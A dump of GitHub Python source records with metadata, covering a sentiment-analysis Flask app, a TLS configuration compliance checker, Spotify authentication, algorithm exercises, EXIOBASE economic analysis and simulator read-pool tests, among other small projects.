link_old[13:].replace('&ty=c&p=d&b=1','')\n ticker_list.append(link_new)\n print(number)\n\n #turns the array into a csv with one column and rows that are tickers\n with open(\"All_Tickers_col.csv\", 'w') as resultFile:\n wr = csv.writer(resultFile, dialect = 'excel')\n wr.writerow(['ticker'])\n for val in ticker_list:\n wr.writerow([val])\n\n\n#turns the ticker csv into a list\ndef tickers_to_list():\n a = []\n df = pd.read_csv('All_Tickers_col.csv')\n a = df['ticker'].tolist()\n\n\n","repo_name":"cmodi10/Stock-Trading","sub_path":"findStocksGitHub.py","file_name":"findStocksGitHub.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39224445090","text":"import requests\r\nimport json\r\nimport os\r\nimport yaml\r\nfrom datamodel import SentimentResult\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom flask import Flask\r\nfrom flask import request, send_from_directory\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom waitress import serve\r\n\r\nstatic_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')\r\napp = Flask(__name__, static_url_path='', static_folder='static')\r\nconfig = {}\r\n\r\n@app.route('/')\r\ndef get_main():\r\n return send_from_directory(static_file_dir, 'index.html')\r\n \r\n@app.route('/analyze_sentiment')\r\ndef analyze_sentiment():\r\n global config\r\n query = request.args.get('query')\r\n sid = SentimentIntensityAnalyzer()\r\n r = requests.get(config['reddit.api'] + query)\r\n posts = json.loads(r.text)['data']\r\n positive = SentimentResult()\r\n negative = SentimentResult()\r\n neutral = SentimentResult()\r\n for post in posts:\r\n full_link = post['full_link']\r\n \r\n if 'selftext' not in post.keys():\r\n continue\r\n \r\n selftext = post['selftext']\r\n sentences = sent_tokenize(selftext)\r\n for i in range(len(sentences)):\r\n sentence = sentences[i]\r\n if query in sentence: \r\n score = sid.polarity_scores(sentence)['compound']\r\n post_result = dict()\r\n post_result['score'] = score\r\n post_result['text'] = sentence\r\n post_result['link'] = post['full_link']\r\n \r\n if score < -0.05:\r\n negative.add_post(post_result)\r\n elif score > 0.05:\r\n positive.add_post(post_result)\r\n else:\r\n neutral.add_post(post_result)\r\n positive.trim_list()\r\n negative.trim_list()\r\n neutral.trim_list()\r\n \r\n return '{ \"positive\":' + json.dumps(positive.__dict__) + ', \"negative\":' + json.dumps(negative.__dict__) + ', \"neutral\":' + json.dumps(neutral.__dict__) + '}'\r\n\r\ndef read_config(config_file):\r\n global config\r\n with open(config_file, 'r') as stream:\r\n try:\r\n config = yaml.safe_load(stream)\r\n except yaml.YAMLError as exc:\r\n raise exc\r\n\r\nif __name__ == '__main__':\r\n read_config(\"config.yaml\")\r\n serve(app, host='0.0.0.0', port=5000)","repo_name":"cpetroaca/ibs-sentiment-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32040571444","text":"\n# 형태소만 뽑아 저장\nstopwords = ['은','는','가','하','아','것','들','의','되','수','보','주','등','한']\n\ndef tense_tokenizer(sentence, pos=[\"J\",\"E\"], stopword=stopwords): \n\n from konlpy.tag import Hannanum\n hannanum = Hannanum()\n\n sentence = [word for word, tag in hannanum.pos(sentence) if len(word) > 0 and tag in pos and word not in stopword]\n\n return sentence\n\n\n# tfidf, model\ndef 
tense_ml(sentence):\n\n import joblib\n\n loaded_vectorizer = joblib.load('./tense_vectorizer_customized.pkl') \n loaded_model = joblib.load('./tense_model_customized.pkl') \n\n #df_token_list = [str(x).lower() for x in df]\n df_token = tense_tokenizer(sentence) \n df_tfidf = loaded_vectorizer.transform(df_token)\n\n pred = loaded_model.predict(df_tfidf)\n pred = pred[-1]\n\n return pred\n\nif __name__ == \"__main__\":\n print(tense_ml('김금희 소설가는 "계약서 조정이 그리 어려운가 작가를 격려한다면서 그런 문구 하나 고치기가 어려운가 작가의 노고와 권리를 존중해줄 수 있는 것 아닌가"라고 꼬집었다.'))\n","repo_name":"tmdqja75/ml_nlp_project","sub_path":"tense_yeram/fin_tense.py","file_name":"fin_tense.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74931966441","text":"\nimport os\nimport spotipy\nfrom json.decoder import JSONDecodeError\nimport spotipy.util as util\n\ndef Spotify_auth(client_id, client_secret):\n \"\"\"Required to use Spotify's API start with this always must pass a client ID & client secret\"\"\"\n try:\n token = util.prompt_for_user_token(\"Alvin Chung\",\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri=\"https://example.com/callback/\")\n except (AttributeError, JSONDecodeError):\n os.remove(f\".cache-Alvin Chung\")\n token = util.prompt_for_user_token(\"Alvin Chung\",\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri=\"https://example.com/callback/\")\n\n\n spotify = spotipy.Spotify(auth=token)\n return spotify\n\n","repo_name":"togobingi/spotifyMe","sub_path":"auth/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9751981950","text":"def balance(root):\n if(root is None):\n return (0,True)\n else:\n lv1,l=balance(root.left)\n lv2,r=balance(root.right)\n if(l==False or r==False):\n return -1,False\n m=max(lv1,lv2)\n if(abs(lv1-lv2)<=1):\n x=True\n return (m+1,True)\n else:\n return -1,False\n \n\nclass Solution(object):\n def isBalanced(self, root):\n return balance(root)[1]\n","repo_name":"AumkarG/Algorithms-and-Data-Structures","sub_path":"LeetCode/Trees/Balanced Binary Tree_372584751.py","file_name":"Balanced Binary Tree_372584751.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7008171271","text":"import pprint\nfrom vehicle.train import Train\nfrom vehicle.airbus import Airbus\n\n\ntrain1 = Train(60,20,100000 , 70, 20)\ntrain1.set_color('Blue')\ntrain1.pretty_print()\n\n\n\nairbus1 = Airbus(\n speed=1000,\n old=10,\n price=30000000,\n tank_volume=20,\n fuel_consumption=1\n)\nairbus1.set_color('Green')\nairbus1.pretty_print()","repo_name":"Terehov2088/HomeWork1-10","sub_path":"36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23546821120","text":"def main():\n print(\"Welcome to My To-Do List App!\")\n tasks = []\n \n while True:\n print(\"\\n1. Add Task\")\n print(\"2. View Tasks\")\n print(\"3. Quit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == '1':\n task = input(\"Enter a new task: \")\n tasks.append(task)\n function_1()\n elif choice == '2':\n print(\"\\n--- Your Tasks ---\")\n for index, task in enumerate(tasks, start=1):\n print(f\"{index}. 
{task}\")\n elif choice == '3':\n function_n()\n break\n else:\n function_2()\n\ndef function_1():\n print(\"Task added successfully!\")\n return \ndef function_2():\n print(\"Please Type '1','2',or'3'\")\n return\ndef function_n():\n print(\"Goodbye!\")\n return\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sem2093/HarvardCS50P","sub_path":"final-project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70609167399","text":"import os\n\nxml_pred_dir = './data/plate_data/test/xml_pred'\noutput_dir = './data/plate_data/test/output'\n\ndef write_plate_data(xml_file, platetext, xmin, ymin, xmax, ymax):\n print(\"Writing to\", xml_file)\n data = f'' \\\n\t f'{platetext}' \\\n\t\t f''\\\n\t\t f'{xmin}' \\\n\t\t f'{ymin}' \\\n\t\t f'{xmax}' \\\n\t\t f'{ymax}' \\\n\t\t f'' \\\n\t f''\n with open(xml_file, 'w') as f:\n f.write(data)\n\nif __name__ == '__main__':\n # Read bouding box and platetext from .txt files in output folder\n # then write to xml file \n if not os.path.exists(xml_pred_dir):\n os.makedirs(xml_pred_dir)\n for idx in range(1, 101):\n with open(os.path.join(output_dir, str(idx)+'.txt'), 'r') as f:\n xmin, ymin, xmax, ymax = map(int, f.readline().split())\n with open(os.path.join(output_dir, str(idx)+'_text.txt'), 'r') as f:\n label = f.readline()\n write_plate_data(os.path.join(xml_pred_dir, str(idx)+'.xml'), label, xmin, ymin, xmax, ymax)\n ","repo_name":"hoangmaihuy/license_plate_recognition","sub_path":"data/convert_test_output.py","file_name":"convert_test_output.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10535611404","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, k = map(int, input().split())\nparents = [i for i in range(N+1)]\ncheck = [False for i in range(N+1)]\nsum_val = 0\n\ndef find(v):\n if v == parents[v]:\n return v\n parents[v] = find(parents[v])\n return parents[v]\n\ndef union(u, v):\n u = find(u)\n v = find(v)\n if u == v:\n return False\n if(cost[u] >= cost[v]):\n parents[u] = v\n else:\n parents[v] = u\n return True\n\ncost = [0]+ list(map(int, input().split()))\nfor _ in range(M):\n u, v = map(int, input().split())\n union(u, v)\n\nfor i in range(1, N+1):\n find(i)\n\nfor i in range(1, N+1):\n if check[parents[i]]:\n continue\n sum_val += cost[parents[i]]\n check[parents[i]] = True\n\nif k >= sum_val:\n print(sum_val)\nelse:\n print('Oh no')","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2304/26/이경훈_16562_친구비.py","file_name":"이경훈_16562_친구비.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"4596209763","text":"from prev_ob_models.utils import RunInClassDirectory, IsolatedCell\r\n\r\nclass MC(IsolatedCell):\r\n def __init__(self):\r\n with RunInClassDirectory(MC):\r\n from neuron import h,gui\r\n\r\n h.xopen(\"mitral.hoc\")\r\n h.xopen(\"memb.hoc\")\r\n\r\n h.celsius = 23\r\n\r\n self.h = h\r\n self.soma = self.h.soma\r\n\r\n h.cvode_active(1)\r\n\r\n\r\n\r\n\r\n","repo_name":"JustasB/OlfactoryBulb","sub_path":"prev_ob_models/Shen1999/isolated_cells.py","file_name":"isolated_cells.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"28431893398","text":"import socket\nimport 
time\nimport subprocess\nimport traceback\nimport copy\nfrom time import sleep\nfrom utils.output import Output\nfrom utils.db import DB\nimport dataclasses\n\nfrom sslyze import *\nimport sslyze\nfrom sslyze.mozilla_tls_profile.mozilla_config_checker import (\n MozillaTlsConfigurationChecker,\n ServerNotCompliantWithMozillaTlsConfiguration,\n ServerScanResultIncomplete,\n)\nfrom sslyze.mozilla_tls_profile.mozilla_config_checker import MozillaTlsConfigurationEnum\nfrom sslyze.plugins.session_renegotiation_plugin import SessionRenegotiationScanResult\nfrom sslyze.scanner.models import SessionRenegotiationScanAttempt\n\n\ndef tlsscan_worker(target, tls_config, timeout):\n\n retry = 0\n while True:\n try:\n server_location = ServerNetworkLocation(hostname=target['hostname'], port=target['port'])\n request = ServerScanRequest(server_location=server_location, network_configuration=ServerNetworkConfiguration(server_location.hostname, network_timeout=timeout))\n except sslyze.errors.ServerHostnameCouldNotBeResolved:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'Not resolved'}) \n\n return\n\n scanner = Scanner()\n scanner.queue_scans([request])\n res = next(scanner.get_results())\n\n if res.scan_status == ServerScanStatusEnum.ERROR_NO_CONNECTIVITY:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'No conn'}) \n return\n\n # In some cases, session_renegotiation required a client certificate. This means sslyze won't like it and will not display the results, hack it\n test = getattr(res.scan_result, ScanCommand.SESSION_RENEGOTIATION.value)\n if test.status == ScanCommandAttemptStatusEnum.ERROR:\n result = res.scan_result\n\n new_result = dataclasses.replace(result, session_renegotiation=SessionRenegotiationScanAttempt(status=ScanCommandAttemptStatusEnum.COMPLETED, error_reason=None, error_trace=None, result=SessionRenegotiationScanResult(supports_secure_renegotiation=True, is_vulnerable_to_client_renegotiation_dos=False)))\n\n new_res = dataclasses.replace(res, scan_result=new_result)\n\n res = new_res\n\n mozilla_checker = MozillaTlsConfigurationChecker.get_default()\n try:\n if tls_config == 'old':\n mozilla_config = MozillaTlsConfigurationEnum.OLD\n elif tls_config == 'intermediate':\n mozilla_config = MozillaTlsConfigurationEnum.INTERMEDIATE\n elif tls_config == 'modern':\n mozilla_config = MozillaTlsConfigurationEnum.MODERN\n else:\n raise NotImplementedError()\n \n mozilla_checker.check_server(against_config=mozilla_config, server_scan_result=res)\n\n Output.success({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'TLS: Certificate compliant with Mozilla\\'s %s configuration' % tls_config}) \n except ServerNotCompliantWithMozillaTlsConfiguration as e:\n Output.vuln({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'TLS: Certificate not compliant with Mozilla\\'s %s configuration' % tls_config}) \n\n for criteria, error_description in e.issues.items():\n Output.vuln({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': ' - %s: %s' % (criteria, error_description)}) \n vuln_info = {\n 'hostname': target['hostname'],\n 'port': target['port'],\n 'service': 'ssl',\n 'url': 'ssl://%s:%d' % (target['hostname'], target['port']),\n 'name': '%s: %s' % (tls_config, criteria),\n 'description': error_description,\n }\n DB.insert_vulnerability(vuln_info)\n except ServerScanResultIncomplete as e:\n\n if retry < 3:\n retry += 1\n time.sleep(1)\n 
continue\n else:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'Scan did not run successfully: %s' % str(e)}) \n\n break\n\n\n\n\n","repo_name":"hegusung/netscan","sub_path":"scripts/lib/tlsscan/tlsscan.py","file_name":"tlsscan.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"29281427678","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import Select\r\nimport time\r\n\r\nclass jay:\r\n driver = webdriver.Chrome()\r\n\r\n def display_per_pages(self):\r\n self.driver.get('https://www.imdb.com/search/title/')\r\n self.driver.maximize_window\r\n user_ratings = self.driver.find_element(by = By.NAME, value = 'user_rating-min')\r\n user_ratings_dropdown = Select(user_ratings)\r\n user_ratings_dropdown.select_by_visible_text('6.3')\r\n display_ratings = self.driver.find_element(by = By.NAME, value = 'count')\r\n display_ratings_dropdown = Select(display_ratings)\r\n display_ratings_dropdown.select_by_visible_text('250 per page')\r\n display_ratings.click()\r\n time.sleep(9)\r\n submit_button = self.driver.find_element(by = By.XPATH, value = '//*[@id=\"main\"]/p[3]/button')\r\n submit_button.click()\r\n time.sleep(14)\r\n\r\ns = jay()\r\n\r\ns.display_per_pages()","repo_name":"prakash2196/prakash2196","sub_path":"zen_class_workouts/fun34.py","file_name":"fun34.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72904572840","text":"import os\n\ndef walkfiles(dir):\n for root, dirs, files in os.walk(dir):\n #for f in files:\n # print(os.path.join(root, f))\n for d in dirs:\n print(os.path.join(root, d))\ndef update_dirs(dir):\n model = \"cd @DIR ; git remote update ; cd -\"\n dirs = os.listdir(dir)\n for d in dirs:\n if os.path.isdir(d):\n model_t = model.replace(\"@DIR\", d)\n print(model_t)\n os.system(model_t)\ndef main():\n #walkfiles(\".\")\n update_dirs(\".\")\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Henry-Hwang/hvim","sub_path":"git-update.py","file_name":"git-update.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35618669637","text":"import re\nfrom os import environ\n\nid_pattern = re.compile(r'^.\\d+$')\ndef is_enabled(value, default):\n if value.lower() in [\"true\", \"yes\", \"1\", \"enable\", \"y\"]:\n return True\n elif value.lower() in [\"false\", \"no\", \"0\", \"disable\", \"n\"]:\n return False\n else:\n return default\n\n\nLONG_IMDB_DESCRIPTION = is_enabled(environ.get(\"LONG_IMDB_DESCRIPTION\", \"False\"), False)\nMAX_LIST_ELM = environ.get(\"MAX_LIST_ELM\", None)\nIMDB = is_enabled((environ.get('IMDB', \"True\")), True)\n","repo_name":"Lallu-lallus/baby_groot","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4698319470","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n#Get libraries \n\nfrom matplotlib.pyplot import title\nimport pymrio\nimport pandas \nimport numpy as np\nimport pandas as pd\n\n\n#Write Input for analysis \n\n#two letter code for country \nCountry = 'FR'\n\nghg = 'GHG emissions (GWP100) | Problem oriented approach: baseline (CML, 2001) | GWP100 (IPCC, 
2007)'\n\n\n# ## Get the Leonfeif Inverse and merge into one dataframe to compare, get top 20 values\n\n# In[5]:\n\n\n#Load EXIOBASE 1996\nexio3_1996 = pymrio.parse_exiobase3(path='IOT_1996_pxp.zip')\nexio3_1996.calc_all()\n#Load EXIOBASE 1998\nexio3_1998 = pymrio.parse_exiobase3(path='IOT_1998_pxp.zip')\nexio3_1998.calc_all()\n#Load EXIOBASE 2000\nexio3_2000 = pymrio.parse_exiobase3(path='IOT_2000_pxp.zip')\nexio3_2000.calc_all()\n#Load EXIOBASE 2002\nexio3_2002 = pymrio.parse_exiobase3(path='IOT_2002_pxp.zip')\nexio3_2002.calc_all()\n#Load EXIOBASE 2004\nexio3_2004 = pymrio.parse_exiobase3(path='IOT_2004_pxp.zip')\nexio3_2004.calc_all()\n#Load EXIOBASE 2006\nexio3_2006 = pymrio.parse_exiobase3(path='IOT_2006_pxp.zip')\nexio3_2006.calc_all()\n#Load EXIOBASE 2008\nexio3_2008 = pymrio.parse_exiobase3(path='IOT_2008_pxp.zip')\nexio3_2008.calc_all()\n#Load EXIOBASE 2010\nexio3_2010 = pymrio.parse_exiobase3(path='IOT_2010_pxp.zip')\nexio3_2010.calc_all()\n#Load EXIOBASE 2012\nexio3_2012 = pymrio.parse_exiobase3(path='IOT_2012_pxp.zip')\nexio3_2012.calc_all()\n#Load EXIOBASE 2014\nexio3_2014 = pymrio.parse_exiobase3(path='IOT_2014_pxp.zip')\nexio3_2014.calc_all()\n#Load EXIOBASE 2016\nexio3_2016 = pymrio.parse_exiobase3(path='IOT_2016_pxp.zip')\nexio3_2016.calc_all()\n#Load EXIOBASE 2018\nexio3_2018 = pymrio.parse_exiobase3(path='IOT_2018_pxp.zip')\nexio3_2018.calc_all()\n#load EXIOBASE 2020\nexio3_2020 = pymrio.parse_exiobase3(path='IOT_2020_pxp.zip')\nexio3_2020.calc_all()\n#load EXIOBASE 2022\nexio3_2022 = pymrio.parse_exiobase3(path='IOT_2022_pxp.zip')\nexio3_2022.calc_all()\n\n\n# In[8]:\n\n\n##Define Leonteif inverse for Each each year\n\n#L matrix For 1996\nL_1996 = exio3_1996.L[Country]\nL_1998 = exio3_1998.L[Country]\nL_2000 = exio3_2000.L[Country]\nL_2002 = exio3_2002.L[Country]\nL_2004 = exio3_2004.L[Country]\nL_2006 = exio3_2006.L[Country]\nL_2008 = exio3_2008.L[Country]\nL_2010 = exio3_2010.L[Country]\nL_2012 = exio3_2012.L[Country]\nL_2014 = exio3_2014.L[Country]\nL_2016 = exio3_2016.L[Country]\nL_2018 = exio3_2018.L[Country]\nL_2020 = exio3_2020.L[Country]\nL_2022 = exio3_2022.L[Country]\n\n\n# In[34]:\n\n\n#get Leontief for agriculture\nL_Agr_1996 = L_1996.iloc[:, 0:15]\nL_Agr_1998 = L_1998.iloc[:, 0:15]\nL_Agr_2000 = L_2000.iloc[:, 0:15]\nL_Agr_2002 = L_2002.iloc[:, 0:15]\nL_Agr_2004 = L_2004.iloc[:, 0:15]\nL_Agr_2006 = L_2006.iloc[:, 0:15]\nL_Agr_2008 = L_2008.iloc[:, 0:15]\nL_Agr_2010 = L_2010.iloc[:, 0:15]\nL_Agr_2012 = L_2012.iloc[:, 0:15]\nL_Agr_2014 = L_2014.iloc[:, 0:15]\nL_Agr_2016 = L_2016.iloc[:, 0:15]\nL_Agr_2018 = L_2018.iloc[:, 0:15]\nL_Agr_2020 = L_2020.iloc[:, 0:15]\nL_Agr_2022 = L_2022.iloc[:, 0:15]\n\n\n# In[72]:\n\n\n#L_Agr_1996.groupby('sector')['Paddy rice'].nlargest(20)\n\nsector = 'Oil seeds'\n\n#1996\nd = L_Agr_1996[sector].nlargest(10)\nd = pd.DataFrame(data=d)\nd.plot(kind='bar',title = sector +' Leontief Matrix- 1996', fontsize= 10)\n\n\n# In[73]:\n\n\n#2022\nd2 = L_Agr_2022[sector].nlargest(10)\nd2 = pd.DataFrame(data=d2)\nd2.plot(kind='bar',title = sector +' Leontief Matrix- 2022', fontsize= 10)\n\n\n# In[100]:\n\n\n#Total Intermediate demand for 1996 per sector\nFrance_output = exio3_1996.Z.loc[Country]\nFrance_Agr_output = France_output.iloc[0:15]\nTotal_Intermediate_1996 = France_Agr_output.sum(axis=1)\n\n#Total final demad 1996\nFinal_demand_FR = exio3_1996.Y.loc[Country]\nFinal_demand_FR_agr = Final_demand_FR.iloc[0:15]\nTotal_Finaldemand_1996 = Final_demand_FR_agr.sum(axis=1)\n\n#merge and plot\ndata_Z = { 
'Intermediate':Total_Intermediate_1996, 'Final Demand':Total_Finaldemand_1996}\nCompare = pd.DataFrame(data=data_Z )\nCompare.plot(kind='bar', title = 'Intermediate vs Final Demand- 1996')\n\n\n# In[139]:\n\n\n#Total Intermediate demand for 2022 per sector\nFrance_output_22 = exio3_2022.Z.loc[Country]\nFrance_Agr_output22 = France_output_22.iloc[0:15]\nTotal_Intermediate_2022 = France_Agr_output22.sum(axis=1)\n\n#Total final demad 2022\nFinal_demand_FR22 = exio3_2022.Y.loc[Country]\nFinal_demand_FR_agr22 = Final_demand_FR22.iloc[0:15]\nTotal_Finaldemand_2022 = Final_demand_FR_agr22.sum(axis=1)\n\n#merge and plot\ndata_Z22 = { 'Intermediate':Total_Intermediate_2022, 'Final Demand':Total_Finaldemand_2022}\nCompare22 = pd.DataFrame(data=data_Z22 )\nCompare22.plot(kind='bar', title = 'Intermediate vs Final Demand- 2022')\n\n\n# In[141]:\n\n\n#Find Exports as a percentage of total output of French Agriculture 1996\n\n#1996 total ouptput\nX_1996 = Total_Intermediate_1996 + Total_Finaldemand_1996\n\n#calculate french intermediate consumption\nFrance_output = exio3_1996.Z.loc[Country]\nFrance_agr_Z = France_output[Country]\nFZ_96 = France_agr_Z.iloc[0:15].sum(axis=1)\n\n#calculate french final demand consumption\nFrench_Y = exio3_1996.Y.loc[Country]\nFrench_Y = French_Y[Country]\nFrench_Y_agr = French_Y.iloc[0:15].sum(axis=1)\n\n#Calculate french consumption as a portion of total agricultural output -1996\nconsumption = French_Y_agr + FZ_96\nratio_1996 = consumption/X_1996\nratio_1996\n\n\n# In[142]:\n\n\n#Find Exports as a percentage of total output of French Agriculture - 2022\n\n#2022 total ouptput\nX_2022 = Total_Finaldemand_2022 + Total_Intermediate_2022\n\n#calculate french intermediate consumption\nFrance_output = exio3_2022.Z.loc[Country]\nFrance_agr_Z = France_output[Country]\nFZ_22 = France_agr_Z.iloc[0:15].sum(axis=1)\n\n#calculate french final demand consumption\nFrench_Y = exio3_2022.Y.loc[Country]\nFrench_Y = French_Y[Country]\nFrench_Y_agr22 = French_Y.iloc[0:15].sum(axis=1)\n\n#Calculate french consumption as a portion of total agricultural output -1996\nconsumption22 = French_Y_agr22 + FZ_22\nratio_2022 = consumption22/X_2022\n\n\n# In[144]:\n\n\n#Percentage of Total Domestic consumption of French agriculture goods\n\n#merge and plot\nconsumptiondata = { '1996':ratio_1996, '2022':ratio_2022}\nConsumption_agr = pd.DataFrame(data=consumptiondata )\nConsumption_agr.plot(kind='bar', title = 'Portion of Domestic Consumption for French Agricultural Products')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MohamedhBadr/EXIO_env_intensity","sub_path":"Leontief- French agr.py","file_name":"Leontief- French agr.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14680863744","text":"# Escreva um programa que receba um número inteiro na entrada e verifique se o número recebido possui ao menos um dígito com um dígito adjacente igual a ele. 
Caso exista, imprima \"sim\"; se não existir, imprima \"não\".\nn = int(input(\"Digite um valor para n: \"))\nx = 10\ny = 1\nsum = 0\nwhile(n//x != 0): \n x = x * 10\n y = y + 1\nx = x//10\nant = n//x\nn = n - x * ant\nx = x//10\ny = y - 1 \nresp = False\nwhile(y > 0):\n prox = n//x\n if(ant == prox): resp = True\n ant = prox\n sum = sum + (n//x)\n n = n - x * ant\n x = x//10\n y = y - 1\nif resp: print(\"sim\")\nelse: print(\"não\")","repo_name":"Minji0h/Introduce-at-CCO-with-python","sub_path":"Semana4/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27048547523","text":"\"\"\"\nMultistage Graphs :- Directed, weighted graph in which nodes can be divided in stages.\n\"\"\"\nfrom math import inf\n\n\nclass GraphShortestPath:\n def __init__(self, graph, number_of_node, stages):\n self.graph = graph\n self.number_of_node = number_of_node\n self.stages = stages\n\n def shortest_path_and_cost(self):\n cost_data = [0 for _ in range(self.number_of_node)]\n destination_vertex = [0 for _ in range(self.number_of_node)]\n path = [0 for _ in range(self.stages)]\n\n cost_data[-1] = 0\n destination_vertex[-1] = self.number_of_node-1\n\n for possible_vertex in range(self.number_of_node-2, -1, -1):\n local_minimum_possible_cost = inf\n\n for neighbour_vertex in range(possible_vertex, self.number_of_node):\n cost = self.graph[possible_vertex][neighbour_vertex] + cost_data[neighbour_vertex]\n\n if self.graph[possible_vertex][neighbour_vertex] != 0 and cost < local_minimum_possible_cost:\n local_minimum_possible_cost = cost\n destination_vertex[possible_vertex] = neighbour_vertex\n\n cost_data[possible_vertex] = local_minimum_possible_cost\n\n path[0] = 0\n for stage in range(1, self.stages):\n path[stage] = destination_vertex[path[stage-1]]\n return cost_data[0], path\n\n\n\n\n\n\n","repo_name":"sweta-chauhan/Algorithms","sub_path":"src/algorithms/dynamic_programming/multistage_graphs.py","file_name":"multistage_graphs.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73458205480","text":"import pytest\nimport numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\n\nfrom simreaduntil.shared_utils.dna import get_random_DNA_seq\nfrom simreaduntil.simulator.readpool import ReadPoolFromIterable, ReadPoolFromIterablePerChannel, ReadPoolFromFile, reads_from_file_gen, NoReadLeft\n\ngen_from_list = pytest.helpers.gen_from_list\n\n\n@pytest.fixture\ndef dummy_reads_fasta(tmp_path):\n \"\"\"\n Creates a dummy fasta file with reads\n \"\"\"\n filename = tmp_path / \"test111.fasta\"\n with open(filename, \"w\") as f:\n SeqIO.write(SeqIO.SeqRecord(Seq(\"AAACCTGG\"), id=\"read1\"), f, \"fasta\")\n SeqIO.write(SeqIO.SeqRecord(Seq(\"CCCCCGGTT\"), id=\"read2\"), f, \"fasta\")\n return filename\n \n \ndef test_ReadPoolFromIterable():\n # read sequences from list/generator\n read_pool = ReadPoolFromIterable(gen_from_list(((\"read1\", \"GGGAAATCCGAA\"), (\"read2\", \"AAACCTGGTTAGG\"))))\n assert read_pool.nb_reads_returned == 0\n assert read_pool.get_new_read() == (\"read1\", \"GGGAAATCCGAA\")\n assert read_pool.nb_reads_returned == 1\n assert read_pool.get_new_read() == (\"read2\", \"AAACCTGGTTAGG\")\n assert read_pool.nb_reads_returned == 2\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read()\n assert read_pool.nb_reads_returned == 2\n \ndef 
test_ReadPoolFromIterablePerChannel():\n random_state = np.random.default_rng(2)\n random_seqs_gen_from_lens = lambda lengths: (get_random_DNA_seq(n=n, random_state=random_state) for n in lengths)\n \n read_pool = ReadPoolFromIterablePerChannel({1: random_seqs_gen_from_lens([2, 3, 5]), 2: random_seqs_gen_from_lens([8, 9])})\n with pytest.raises(KeyError):\n read_pool.get_new_read()\n \n assert len(read_pool.get_new_read(1)) == 2\n assert len(read_pool.get_new_read(2)) == 8\n assert len(read_pool.get_new_read(1)) == 3\n assert len(read_pool.get_new_read(1)) == 5\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(1)\n # do twice\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(1)\n \n assert len(read_pool.get_new_read(2)) == 9\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(2)\n \ndef test_reads_from_file_gen(dummy_reads_fasta):\n # no shuffle\n assert list(reads_from_file_gen(dummy_reads_fasta)) == [('read1', 'AAACCTGG'), ('read2', 'CCCCCGGTT')]\n \n random_state = np.random.default_rng(2)\n assert list(reads_from_file_gen(dummy_reads_fasta, shuffle_rand_state=random_state)) == [('read1', 'AAACCTGG'), ('read2', 'CCCCCGGTT')]\n random_state = np.random.default_rng(5)\n assert list(reads_from_file_gen(dummy_reads_fasta, shuffle_rand_state=random_state)) 